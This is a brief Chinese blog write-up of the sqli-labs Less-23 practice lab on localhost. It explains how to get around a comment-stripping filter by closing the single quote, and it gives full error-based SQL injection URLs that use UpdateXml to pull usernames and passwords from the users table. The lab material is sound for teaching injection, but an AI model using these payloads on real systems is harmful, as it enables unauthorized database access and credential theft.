【sqli-labs】 less23 Error based - strip comments (GET型基于错误的去除注释的注入)
2024-10-01 03:16:51
、
加单引号报错
加#
http://localhost/sqli-labs-master/Less-23/?id=1'%23
错误没有改变,推测过滤了#
查看源码发现# -- 都被替换掉了
那么可用通过闭合单引号的方式
http://localhost/sqli-labs-master/Less-23/?id=1' and '1'='1
然后通过UpdateXml函数利用报错取数据
http://localhost/sqli-labs-master/Less-23/?id=1' and UpdateXml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1)='1
http://localhost/sqli-labs-master/Less-23/?id=1' and UpdateXml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)='1
最新文章
- (转载)基于LBS地图的开发,满足地图上有头像的需求
- vs快捷键
- Xn数列(codevs 1281)
- unbuntu server (linux系统)下面安装 lamp
- Echarts通过Ajax实现动态数据加载
- ZOJ 3329 【概率DP】
- 基于Js实现的UrlEncode和UrlDecode函数代码
- spring Bean的三种注入方式
- tinyxml2库的使用--MFC工程
- 我用Cocos2d-x模拟《Love Live!学院偶像祭》的Live场景(三)
- C++编程求数组中重复的数字
- ASP.NET Core 实战:使用 ASP.NET Core Web API 和 Vue.js 搭建前后端分离项目
- [insight] debug
- python 读取默认配置文件和用户配置文件 configs
- Hadoop学习笔记1 - 使用Java API访问远程hdfs集群
- TP内部方法访问
- Winform开发框架之简易工作流设计(转自 伍华聪博客)
- Next generation sequencing (NGS)二代测序数据预处理与分析
- Linux使用笔记
- 【DB2】慎用nickname,可能会引起效率较低